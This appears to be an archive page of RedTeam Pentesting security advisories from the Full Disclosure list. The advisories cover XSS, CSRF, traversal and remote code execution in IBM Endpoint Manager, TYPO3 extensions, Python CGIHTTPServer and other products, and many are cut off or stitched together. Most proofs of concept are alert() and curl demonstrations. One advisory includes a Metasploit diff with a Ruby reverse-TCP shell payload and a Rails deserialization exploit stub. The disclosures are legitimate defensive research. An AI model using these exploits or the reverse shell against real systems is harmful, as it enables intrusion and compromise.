As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature


[FD] [RT-SA-2015-004] Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

2015-06-10 Thread RedTeam Pentesting GmbH
controlled web
page. The vulnerability is therefore rated as a medium risk.


2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-003] Alcatel-Lucent OmniSwitch Web Interface Weak Session ID

2015-06-10 Thread RedTeam Pentesting GmbH
dor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released


[0] https://github.com/xmendez/wfuzz

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

2015-02-18 Thread RedTeam Pentesting GmbH

Implement a new filter which validates file names and insert this filter
before hybris' own MediaFilter. The new filter should return an error
when a file outside the media directory is requested.


Upgrade to a fixed hybris version or apply the vendor's hot fix.

Security Risk

This vulnerability can be used to download files from the file system of
the server. This includes, among others, configuration files and the
hybris order logfile, which contains sensitive data. Therefore, the
vulnerability poses a high risk.


2014-10-08 Vulnerability identified
2014-10-08 Customer notified vendor
2014-10-29 Vendor released fixed version
2014-11-11 CVE number requested
2014-11-12 Vendor requests more time to notify their customers
2014-11-14 CVE number assigned
2014-12-08 Vendor again requests more time to notify customers
2015-01-12 Vendor notifies customers again, agrees to release advisory
   on 2015-02-18
2015-02-17 Vendor requests more time to notify customers for the 3rd
   time, RedTeam Pentesting declines
2015-02-18 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-013] Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page

2015-02-10 Thread RedTeam Pentesting GmbH
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics

During a penetration test, RedTeam Pentesting discovered that the IBM
Endpoint Manager Relay Diagnostics page allows anybody to persistently
store HTML and JavaScript code that is executed when the page is opened
in a browser.


Product: IBM Endpoint Manager
Affected Versions:  9.1.x versions earlier than 9.1.1229,
9.2.x versions earlier than
Fixed Versions: 9.1.1229,
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE:  CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137


IBM Endpoint Manager products - built on IBM BigFix technology - can
help you achieve smarter, faster endpoint management and security. These
products enable you to see and manage physical and virtual endpoints
including servers, desktops, notebooks, smartphones, tablets and
specialized equipment such as point-of-sale devices, ATMs and
self-service kiosks. Now you can rapidly remediate, protect and report
on endpoints in near real time.

(from the vendor's homepage)

More Details

Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
typically serve HTTP and HTTPS on port 52311. There, the server or relay
diagnostics page is normally accessible at the path /rd. That page can
be accessed without authentication and lets users query and modify
different information. For example, a TEM Relay can be instructed to
gather a specific version of a certain Fixlet site by requesting a URL
such as the following:


The URL parameter url is susceptible to cross-site scripting. When the
following URL is requested, the browser executes the JavaScript code
provided in the parameter:


The value of that parameter is also stored in the TEM Relay's site list,
so that the embedded JavaScript code is executed whenever the
diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd


Proof of Concept



Upgrade IBM Endpoint Manager to version 9.1.1229 or

Security Risk

As the relay diagnostics page is typically not frequented by
administrators and does not normally require authentication, it is
unlikely that the vulnerability can be exploited to automatically and
reliably attack administrative users and obtain their credentials.

Nevertheless, the ability to host arbitrary HTML and JavaScript code on
the relay diagnostics page, i.e. on a trusted system, may allow
attackers to conduct very convincing phishing attacks.

This vulnerability is therefore rated as a medium risk.


2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital si

[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to
version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by
specifying the target URL in the URL parameter board_url in URLs like the


CVE-2014-8870 was assigned to this issue.

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning
  Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Tapatalk plugin for the WoltLab Burning Board forum software,
which allows attackers to inject arbitrary JavaScript code via URL


Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: >= 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869


"Tapatalk is an app built for interacting with discussion forums on
mobile devices. It differs from a forum’s mobile web skin in that it
offers the speed of a native app and a streamlined unified interface for
every forum a user subscribes to. Tapatalk also creates a unique
eco-system that allows forums to be searched and discovered by millions
of Tapatalk users which in turn promotes content, new memberships, and

(from Tapatalk's Homepage)

More Details

The Tapatalk extension includes the PHP script welcome.php at the path


which is accessible via the URL


on systems using the plugin. It outputs JavaScript code that includes
improperly encoded values from the two URL parameters "app_android_id"
and "app_kindle_url". Depending on which parameters is used, one of
their values is assigned to the PHP variable $byo:



Proof of Concept

The following URL can be used to demonstrate the vulnerability:

  ?app_kindle_url=");alert('RedTeam Pentesting');

[FD] [RT-SA-2014-012] Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components

2014-12-02 Thread RedTeam Pentesting GmbH
index 7803dd5..e72d8c2 100644
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -141,20 +141,25 @@ class Metasploit3 < Msf::Exploit::Remote
-  # This stub ensures that the payload runs outside of the Rails process
-  # Otherwise, the session can be killed on timeout
+  # This stub tries to ensure that the payload runs outside of the Rails
+  # process Otherwise, the session can be killed on timeout
   def detached_payload_stub(code)
 code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first
-if RUBY_PLATFORM =~ /mswin|mingw|win32/
-  inp = IO.popen("ruby", "wb") rescue nil
-  if inp
-  end
+if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen("ruby", "wb") 
rescue nil)
+  inp.write(code)
-  Kernel.fork do
+  def _fork
+  Kernel.fork
+rescue NotImplementedError
+  -1
+  end
+  pid = _fork
+  if 0 == pid or -1 == pid
@@ -234,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote
   'method' => datastore['HTTP_METHOD'],
 }, 25)
 if res && !res.get_cookies.empty?
-  match = 
res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)
+  match = 
 if match
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb 
index f17c669..0100929 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
@@ -37,8 +37,31 @@ module Metasploit3
   def ruby_string
 lhost = datastore['LHOST']
 lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-"require 'socket';c=TCPSocket.new(\"#{lhost}\", 
#{datastore['LPORT'].to_i});" +
 if l.length==0;" +
-"(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil 
+ruby = <<-EOF
+require 'socket'
+c=TCPSocket.new("#{lhost}", #{datastore['LPORT'].to_i})
+def reopen(old, new)
+  begin
+  rescue IOError => e
+  end
+$stdin = reopen($stdin, c)
+$stdout = reopen($stdout, c)
+$stderr = reopen($stderr, c)
+$stdin.each_line{ |l| l=l.strip
+next if l.length==0
+(IO.popen(l,"rb") { |fd|
+fd.each_line { |o|
+}) rescue nil


It might be possible to binary patch the Java class files to use a
different secret_token value and redeploy the application. This is
untested, however.


Install version 9.0.60100 of the affected software components.

Security Risk

The vulnerability allows unauthenticated remote attackers to execute
arbitrary code with administrative privileges on the affected systems.
It is highly likely that a successful attack on the application server
can also be leveraged into a full compromise of all devices managed
through the product. This constitutes a high risk.


2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-08-15 Vendor notified, vendor acknowledges receiving the advisory
2014-09-03 Update requested from vendor
2014-09-05 Vendor promises to respond with more details
2014-09-26 Update requested from vendor
2014-09-30 Vendor promises to respond with more details
2014-10-16 Update requested from vendor
2014-10-16 Vendor responds with CVE-ID, plans release for mid-November
2014-11-06 More definite release schedule requested
2014-11-12 Vendor plans release for last week of November
2014-11-21 Additional details requested from vendor
2014-11-22 Vendor responds with details, postpones release to
   mid-December due to issues discovered during quality control
2014-12-01 Vendor announces imminent release
2014-12-01 Vendor releases security bulletin and software upgrade
2014-12-02 Customer approves public disclosure
2014-12-02 Advisory released



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security

[FD] [RT-SA-2014-011] EntryPass N5200 Credentials Disclosure

2014-12-01 Thread RedTeam Pentesting GmbH
se from vendor. Customer discontinued use of the
   product and approved public disclosure
2014-10-20 Contacted vendor again since no fix or roadmap was provided.
2014-10-28 CVE number requested
2014-11-14 CVE number assigned
2014-12-01 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-009] Information Disclosure in TYPO3 Extension ke_questionnaire

2014-12-01 Thread RedTeam Pentesting GmbH
Advisory: Information Disclosure in TYPO3 Extension ke_questionnaire

The TYPO3 extension ke_questionnaire stores answered questionnaires in a
publicly reachable directory on the webserver with filenames that are
easily guessable.


Product: ke_questionnaire 
Affected Versions: 2.5.2 (possibly all versions)
Fixed Versions: unknown
Vulnerability Type: Information Disclosure
Security Risk: medium
Vendor URL: http://kequestionnaire.kennziffer.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-009
Advisory Status: published
CVE: CVE-2014-8874
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8874


"The TYPO3 extension kequestionnaire allows to easily and quickly create
and evaluate individual questionnaires online in any TYPO3 website."

(translated from the official website of ke_questionnaire)

More Details

Files containing the answered questionnaires are stored in the
"typo3temp" directory within the TYPO3 installation. As the source code
of the ke_questionnaire extension shows, the filename of an answered
questionnaire is solely based on the questionnaire ID and the user ID of
the user who created the questionnaire.

Source code (shortened):
function init() {

$this->temp_file = \
function createSchedulerTask(){
$myVars = $GLOBALS['BE_USER']->getSessionData('tx_kequestionnaire');
$file_path = PATH_site.'typo3temp/'.$this->temp_file;

A valid URL that returns the answers to a questionnaire could look like
the following:


Proof of Concept

Using the tool wfuzz[1] it is possible to search for answers to
questionnaires on a TYPO3 site that employs ke_questionnaire:

$ python wfuzz.py -c -z range,14000-15000 -z range,1-10 --hc 301 \


The webserver config should deny access to answered questionnaire files,
for example by adding an .htaccess file that limits access to
tx_kequestionnaire_* files (this may hinder online evaluation of the


No official fix available.

Security Risk

Depending on the questions in the questionnaire the answered
questionnaires may contain personal information including participants'
full names, addresses and so on. The risk therefore strongly depends on
the information supplied in the questionnaires. Since this information
will at least often contain email addresses, it is rated as at least a
medium risk.


2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-06-15 Vendor releases updated version which according to them
   does not fix the issue
2014-10-08 TYPO3 security team says the issue is still unresolved
2014-11-04 Vendor continues to release updated versions, no response
   whether the security issue is fixed
2014-11-14 CVE number assigned
2014-12-01 Advisory released


[1] https://code.google.com/p/wfuzz/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-007] Remote Code Execution in TYPO3 Extension ke_dompdf

2014-12-01 Thread RedTeam Pentesting GmbH
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf

During a penetration test RedTeam Pentesting discovered a remote code
execution vulnerability in the TYPO3 extension ke_dompdf, which allows
attackers to execute arbitrary PHP commands in the context of the


Product: ke_dompdf TYPO3 extension
Affected Versions: 0.0.3<=
Fixed Versions: 0.0.5
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007
Advisory Status: published
CVE: CVE-2014-6235
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235


"DomPDF library and a small pi1 to show how to use DomPDF to render the
current typo3-page to pdf."
(taken from the extension's description)

More Details

The TYPO3 extension ke_dompdf contains a version of the dompdf library
including all files originally supplied with it. This includes an
examples page, which contains different examples for HTML-entities
rendered as a PDF.  This page also allows users to enter their own HTML
code into a text box to be rendered by the webserver using dompdf.
dompdf also supports rendering of PHP files and the examples page also
accepts PHP code tags, which are then executed and rendered into a PDF
on the server.

Since those files are not protected in the TYPO3 extension directory,
anyone can access this URL and execute arbitrary PHP code on the system.
This behaviour was already fixed in the dompdf library, but the typo3
extension ke_dompdf supplies an old version of the library that still
allows the execution of arbitrary PHP code.

Proof of Concept

Access examples.php on the vulnerable system:

Enter PHP code in the text box on the bottom of the page and click the
submit button, for example:

The page will return a PDF file containing the output of the PHP code.


Remove the directory "www" containing the examples.php file or at least
the examples.php file from the extensions' directory.


Update to version 0.0.5 of the extension.

Security Risk



2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-06 CVE number requested
2014-05-10 CVE number assigned
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-09-02 Vendor released fixed version [2]
2014-12-01 Advisory released


The TYPO3 extension ke_dompdf contains an old version of the dompdf
library, which contains an example file that can be used to execute
arbitrary commands.  This vulnerability was fixed in dompdf in 2010. The
relevant change can be found in the github repository of dompdf:

[1] https://github.com/dompdf/dompdf/commit/

TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions:

[2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution

2014-06-26 Thread RedTeam Pentesting GmbH

scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, "No such CGI script (%r)" % scriptname)
if not os.path.isfile(scriptfile):
self.send_error(403, "CGI script is not a plain file (%r)" %

For HTTP GET requests, do_GET() first invokes send_head(). That method
calls is_cgi() to determine whether the requested path is to be executed
as a CGI script. The is_cgi() method uses _url_collapse_path() to
normalize the path, i.e. remove extraneous slashes (/),current directory
(.), or parent directory (..) elements, taking care not to permit
directory traversal below the document root. The is_cgi() function
returns True when the first path element is contained in the
cgi_directories list. As _url_collaps_path() and is_cgi() never URL
decode the path, replacing the forward slash after the CGI directory in
the URL to a CGI script with the URL encoded variant %2f leads to
is_cgi() returning False. This will make CGIHTTPRequestHandler's
send_head() then invoke its parent's send_head() method which translates
the URL path to a file system path using the translate_path() method and
then outputs the file's contents raw. As translate_path() URL decodes
the path, this then succeeds and discloses the CGI script's file

$ curl http://localhost:8000/cgi-bin%2ftest.py
#!/usr/bin/env python2
import json
import sys

db_credentials = "SECRET"
sys.stdout.write("Content-type: text/json\r\n\r\n")
sys.stdout.write(json.dumps({"text": "This is a Test"}))

Similarly, the CGIHTTPRequestHandler can be tricked into executing CGI
scripts that would normally not be executable. The class normally only
allows executing CGI scripts that are direct children of one of the
directories listed in cgi_directories. Furthermore, only direct
subdirectories of the document root (the current working directory) can
be valid CGI directories.

This can be seen in the following example. Even though the sample server
shown above includes "/cgi-bin/subdir" as part of the request handler's
cgi_directories, a CGI script named test.py in that directory is not

$ curl http://localhost:8000/cgi-bin/subdir/test.py
Error code 403.
Message: CGI script is not a plain file ('/cgi-bin/subdir').

Here, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and
returned True. Next, run_cgi() further dissected these paths to perform
some sanity checks, thereby mistakenly assuming subdir to be the
executable script's filename and test.py to be path info. As subdir is
not an executable file, run_cgi() returns an error message. However, if
the forward slash between subdir and test.py is replaced with %2f,
invoking the script succeeds:

$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py
{"text": "This is a Test"}

This is because neither is_cgi() nor run_cgi() URL decode the path
during processing until run_cgi() tries to determine whether the target
script is an executable file. More specifically, as subdir%2ftest.py
does not contain a forward slash, it is not split into the script name
subdir and path info test.py, as in the previous example.

Similarly, using URL encoded forward slashes, executables outside of a
CGI directory can be executed:

$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py
{"text": "This is a Test"}


Subclass CGIHTTPRequestHandler and override the is_cgi() method  with a
variant that first URL decodes the supplied path, for example:

class FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):
def is_cgi(self):
self.path = urllib.unquote(self.path)
return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)


Update to the latest Python version from the Mercurial repository at

Security Risk

The vulnerability can be used to gain access to the contents of CGI
binaries or the source code of CGI scripts. This may reveal sensitve
information, for example access credentials. This can greatly help
attackers in mounting further attacks and is therefore considered to
pose a high risk. Furthermore attackers may be able to execute code that
was not intended to be executed. However, this is limited to files
stored in the server's working directory or in its subdirectories.

The CGIHTTPServer code does contain this warning:
Even when used on a local computer this may allow other local users to
execute code in the context of another user.


2014-04-07 Vulnerability identified
2014-06-11 Customer approved disclosure

[FD] [RT-SA-2013-003] Endeca Latitude Cross-Site Scripting

2014-06-25 Thread RedTeam Pentesting GmbH
Advisory: Endeca Latitude Cross-Site Scripting

RedTeam Pentesting discovered a Cross-Site Scripting (XSS)
vulnerability in Endeca Latitude. By exploiting this vulnerability an
attacker is able to execute arbitrary JavaScript code in the context
of other Endeca Latitude users.


Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-003
Advisory Status: published
CVE:  CVE-2014-2400
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2400


Endeca Latitude is an enterprise data discovery platform for advanced,
yet intuitive, exploration and analysis of complex and varied data.
Information is loaded from disparate source systems and stored in a
faceted data model that dynamically supports changing data. This
integrated and enriched data is made available for search, discovery,
and analysis via interactive and configurable applications.

(from the vendor's homepage)

More Details

Endeca Latitude offers administrators to trigger different functions by
using the following two URLs (see [1]):

 * http://example.com/config?op=
 * http://example.com/admin?op=

When accessing such an URL which uses an invalid value for the HTTP GET
parameter "op", such as
http://example.com/config?op=RedTeam%20Pentesting, an error message is
shown by the webapplication and the invalid value is directly embedded
into the document without prior escaping, which leads to a Cross-Site
Scripting vulnerability.

Proof of Concept

As shown by the following URL, an attacker is able to embed arbitrary
JavaScript code into the context of the Endeca Latitude instance:

http://example.com/config?op=alert('RedTeam Pentesting');


The vendor did not update the vulnerable software, but recommends to
configure all installations to require mutual authentication using TLS
certificates for both servers and clients, while discouraging users from
installing said client certificates in browsers.


Not available. The vendor did not update the vulnerable software to
remedy this issue.

Security Risk

The vulnerability can be used to embed arbitrary JavaScript code and
therefore offers a wide range of possible attacks such as stealing
cookies or displaying a fake login form. Furthermore, an attacker can use
this vulnerability to control the Endeca Latitude instance by using the
API implemented by its web service (see [2]). The risk of this
vulnerability is therefore considered to be high.


2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future
2014-03-13 Vendor responded with additional information about a
   potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little
   information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released


[2] http://docs.oracle.com/cd/E29220_01/index.htm

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2013-002] Endeca Latitude Cross-Site Request Forgery

2014-06-25 Thread RedTeam Pentesting GmbH
Advisory: Endeca Latitude Cross-Site Request Forgery

RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF)
vulnerability in Endeca Latitude. Using this vulnerability, an attacker
might be able to change several different settings of the Endeca
Latitude instance or disable it entirely.


Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-002
Advisory Status: published
CVE:  CVE-2014-2399
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2399


Endeca Latitude is an enterprise data discovery platform for advanced,
yet intuitive, exploration and analysis of complex and varied data.
Information is loaded from disparate source systems and stored in a
faceted data model that dynamically supports changing data. This
integrated and enriched data is made available for search, discovery,
and analysis via interactive and configurable applications.

(from the vendor's homepage)

More Details

Endeca Latitude offers administrators the ability to perform different
administrative and configuration operations by accessing URLs.
These URLs are not secured by a randomly generated token and therefore
are prone to Cross-Site Request Forgery attacks.

For example by accessing the URL http://example.com/admin?op=exit an
administrator can shut down the Endeca Latitude instance. Several other
URLs exist (as documented at [1] and [2]) which can be used to trigger
operations such as flushing cashes or changing the logging settings.

Proof of Concept

An attacker might prepare a website, which can trigger arbitrary
functionality (see [1] and [2]) of an Endeca Latitude instance if
someone opens the attacker's website in a browser that can reach Endeca
Latitude.  An easy way to implement this is to embed a hidden image into
an arbitrary website which uses the corresponding URL as its source:

http://example.com/admin?op=exit"; style="display:hidden" />
http://example.com/config?op=log-disable"; style="display:hidden" />


The vendor did not update the vulnerable software, but recommends to
configure all installations to require mutual authentication using TLS
certificates for both servers and clients, while discouraging users from
installing said client certificates in browsers.


Not available. The vendor did not update the vulnerable software to
remedy this issue.

Security Risk

The vulnerability can enable attackers to be able to interact with an
Endeca Latitude instance in different ways. Possible attacks include the
changing of settings as well as denying service by shutting down a
running instance. Attackers mainly benefit from this vulnerability if
the instance is not already available to them, but for example only to
restricted IP addresses or after authentication. Since this makes it
harder to identify potential target systems and the attack mainly allows
to disturb the service until it is re-started, the risk of this
vulnerability is considered to be low.


2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future
2014-03-13 Vendor responded with additional information about a
   potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little
   information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released



RedTeam Pentesting GmbH

